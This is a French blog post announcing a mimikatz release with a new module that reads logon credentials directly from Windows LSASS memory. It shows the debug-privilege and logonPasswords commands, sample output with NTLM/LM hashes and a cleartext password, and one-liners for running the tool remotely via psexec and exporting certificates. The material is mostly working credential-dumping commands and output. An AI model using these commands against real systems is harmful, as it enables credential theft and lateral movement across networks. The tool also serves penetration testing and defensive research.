le module local sekurlsa
vient d’être incorporé à mimikatz
!
La première version de sekurlsa
(@) fonctionne par injection de la librairie susnommée, la deuxième (::) est un module local de mimikatz
fonctionnant par lecture uniquement !
Après le dernier post sur l’injection de la librairie sekurlsa
, puis celui sur la lecture des clés de déchiffrement depuis LSASS
, il était temps de créer un nouveau module local : mimikatz :: sekurlsa
Nouvelle version !
Le nouveau mimikatz
, en RC pour l’occasion, inclus donc ce nouveau module !
La version prenant en charge ce module est disponible : http://blog.gentilkiwi.com/mimikatz

Il nécessite tout de même, sous NT6, le privilège debug
pour lire des données du processus système LSASS
:
mimikatz 1.0 x64 (RC) /* Traitement du Kiwi (Aug 2 2012 01:32:28) */
// http://blog.gentilkiwi.com/mimikatz
mimikatz # privilege::debug
Demande d'ACTIVATION du privilège : SeDebugPrivilege : OK
mimikatz # sekurlsa::logonPasswords full
Authentification Id : 0;234870
Package d'authentification : NTLM
Utilisateur principal : Gentil Kiwi
Domaine d'authentification : vm-w8-rp-x
msv1_0 :
* Utilisateur : Gentil Kiwi
* Domaine : vm-w8-rp-x
* Hash LM : d0e9aee149655a6075e4540af1f22d3b
* Hash NTLM : cc36cf7a8514893efccd332446158b1a
kerberos :
* Utilisateur : Gentil Kiwi
* Domaine : vm-w8-rp-x
* Mot de passe : waza1234/
wdigest :
* Utilisateur : Gentil Kiwi
* Domaine : vm-w8-rp-x
* Mot de passe : waza1234/
tspkg :
* Utilisateur : Gentil Kiwi
* Domaine : vm-w8-rp-x
* Mot de passe : waza1234/
livessp : n.t. (LUID KO)
L’aide de ce module sera bientôt disponible : http://blog.gentilkiwi.com/mimikatz/sekurlsa.
L’aide de la librairie a été déplacée : http://blog.gentilkiwi.com/mimikatz/librairies/sekurlsa.
Ligne de commande
Au passage, mimikatz
peut maintenant prendre en compte ses commandes directement depuis ses arguments.
Quelques exemples sympas :
mimikatz privilege::debug "sekurlsa::logonPasswords full" exit
psexec \\windows-c -s -c c:\security\mimikatz\Win32\mimikatz.exe "sekurlsa::logonPasswords full" exit
mimikatz crypto::patchcapi crypto::exportCertificates exit
mimikatz nogpo::regedit exit